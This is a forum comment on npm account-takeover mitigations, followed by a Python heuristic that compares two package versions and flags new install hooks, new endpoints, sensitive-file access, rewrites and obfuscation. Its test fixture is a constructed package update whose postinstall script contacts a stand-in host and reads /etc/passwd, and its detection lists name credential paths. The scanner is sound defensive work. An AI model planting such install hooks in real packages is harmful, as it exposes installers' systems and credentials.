by lozenge
1577 days ago
Some mitigations could be:

- Auto-flagging every push from an account for a while after a password reset.
- Automatically scanning the code of frequently downloaded packages for unusual changes (like: adding a postinstall script, contacting a new server in the postinstall script, obfuscated code, a near-total rewrite of the code, inclusion of cryptomining, access to sensitive files like /etc/passwd or /etc/sudoers).

The vagueness of the statement suggests to me they're talking about their defense-in-depth and have never thought about this specific route to account takeover before.
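The second mitigation the comment lists (scanning a new package version for a newly added install hook, a new network endpoint, sensitive-file access, or a near-total rewrite) can be sketched as a simple heuristic diff between two published versions. The following is an added example written for this page, not code from the commenter or from any registry; the two package versions it compares are constructed in-line, and the host name `example.invalid` and the thresholds are illustrative assumptions.

```python
"""Added example: heuristic review of one npm package update.

Compares an old and a new version of a package (manifest plus file
contents) and reports the kinds of changes the comment above flags.
Both package versions below are constructed for illustration.
"""
import re
from typing import Dict, List, Set

# Constructed sample: version 1.0.0 is a one-function library.
OLD_PKG: Dict = {
    "package.json": {"name": "example-lib", "version": "1.0.0",
                     "scripts": {"test": "mocha"}},
    "files": {"index.js": "module.exports = function add(a, b) { return a + b; };\n"},
}

# Constructed sample: version 1.0.1 adds a postinstall hook whose script
# contacts a new host and reads /etc/passwd (the pattern the comment describes).
NEW_PKG: Dict = {
    "package.json": {"name": "example-lib", "version": "1.0.1",
                     "scripts": {"test": "mocha", "postinstall": "node setup.js"}},
    "files": {
        "index.js": "module.exports = function add(a, b) { return a + b; };\n",
        "setup.js": "const fs=require('fs');const https=require('https');\n"
                    "https.get('https://example.invalid/collect',()=>{});\n"
                    "fs.readFileSync('/etc/passwd');\n",
    },
}

# npm lifecycle hooks that run code on the installing machine.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Paths the comment names, plus a few credential locations (assumed list).
SENSITIVE_PATHS = ("/etc/passwd", "/etc/sudoers", "/etc/shadow", ".ssh/", ".npmrc")
# Crude obfuscation / miner indicators; thresholds are assumptions.
OBFUSCATION_RE = re.compile(r"eval\(|new Function\(|(\\x[0-9a-fA-F]{2}){8,}")
MINER_MARKERS = ("stratum+tcp://", "cryptonight")
URL_RE = re.compile(r"https?://([A-Za-z0-9.\-]+)")
REWRITE_SURVIVAL = 0.2  # flag if fewer than 20% of old lines survive


def hostnames(text: str) -> Set[str]:
    """Host names referenced by http(s) URLs in source text."""
    return set(URL_RE.findall(text))


def review_update(old: Dict, new: Dict) -> List[str]:
    """Return human-readable findings for the change old -> new."""
    findings: List[str] = []
    old_scripts = old["package.json"].get("scripts", {})
    new_scripts = new["package.json"].get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        if hook in new_scripts and hook not in old_scripts:
            findings.append(f"new lifecycle script: {hook} -> {new_scripts[hook]!r}")

    old_text = "\n".join(old["files"].values())
    new_text = "\n".join(new["files"].values())
    for host in sorted(hostnames(new_text) - hostnames(old_text)):
        findings.append(f"new network endpoint referenced: {host}")
    for path in SENSITIVE_PATHS:
        if path in new_text and path not in old_text:
            findings.append(f"access to sensitive path: {path}")

    # Near-total rewrite: fraction of the old non-blank lines still present.
    old_lines = {l for l in old_text.splitlines() if l.strip()}
    new_lines = {l for l in new_text.splitlines() if l.strip()}
    if old_lines and len(old_lines & new_lines) / len(old_lines) < REWRITE_SURVIVAL:
        findings.append("near-total rewrite of the package code")

    # Obfuscation and miner markers, checked only in files that changed.
    for name, src in new["files"].items():
        if old["files"].get(name) == src:
            continue
        if OBFUSCATION_RE.search(src):
            findings.append(f"possible obfuscated code in {name}")
        if any(marker in src for marker in MINER_MARKERS):
            findings.append(f"cryptomining indicator in {name}")
    return findings


if __name__ == "__main__":
    for line in review_update(OLD_PKG, NEW_PKG):
        print("FLAG:", line)
```

A registry-side scanner would run this over every new version of a high-download package and route any finding to a human before the version is served; the unchanged-file check keeps the noise down so the reviewer sees only what the update actually changed.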